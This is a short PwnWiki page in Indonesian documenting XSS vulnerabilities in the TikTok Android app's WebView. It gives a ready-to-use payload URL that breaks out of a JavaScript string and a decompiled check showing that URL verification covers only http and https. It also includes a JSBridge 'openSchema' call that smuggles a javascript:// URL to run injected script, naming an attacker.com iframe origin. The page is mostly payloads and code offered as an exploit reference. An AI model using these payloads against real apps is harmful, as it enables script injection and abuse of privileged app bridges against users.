Kerentanan Android TikTok XSS

From PwnWiki
Revision as of 21:15, 26 May 2021 by Pwnwiki (talk | contribs) (Created page with "Meskipun verifikasi tidak didasarkan pada solusi javascript, solusi ini juga dapat digunakan untuk melakukan serangan XSS di WebView.")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Bahasa Indonesia • ‎Chinese • ‎English • ‎中文(中国大陆)‎ • ‎中文(台灣)‎ • ‎中文(繁體)‎

XSS Generik di TikTok WebView

https://m.tiktok.com/falcon/#'),alert(1));//

Eksekusi berikut akan dipicu: 

JSON.stringify(window.performance.getEntriesByName('https://m.tiktok.com/falcon/#'),alert(1));//'))

Add Wiki Activity的另一個XSS

Tambahkan Aktivitas Wiki menerapkan verifikasi URL untuk memastikan bahwa URL dalam daftar hitam tidak akan dibuka di dalamnya. Namun verifikasi hanya dilakukan pada skema http atau https. Karena mereka yakin program lain tidak valid dan tidak perlu diverifikasi.

if(!e.b(arg8)) { 

   com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
   return false;

}public static boolean b(String arg1) { 

   return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);

}

Meskipun verifikasi tidak didasarkan pada solusi javascript, solusi ini juga dapat digunakan untuk melakukan serangan XSS di WebView. 

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
}));
Retrieved from "https://pwnwiki.com/index.php?title=安卓版TikTok_XSS漏洞/id&oldid=3317"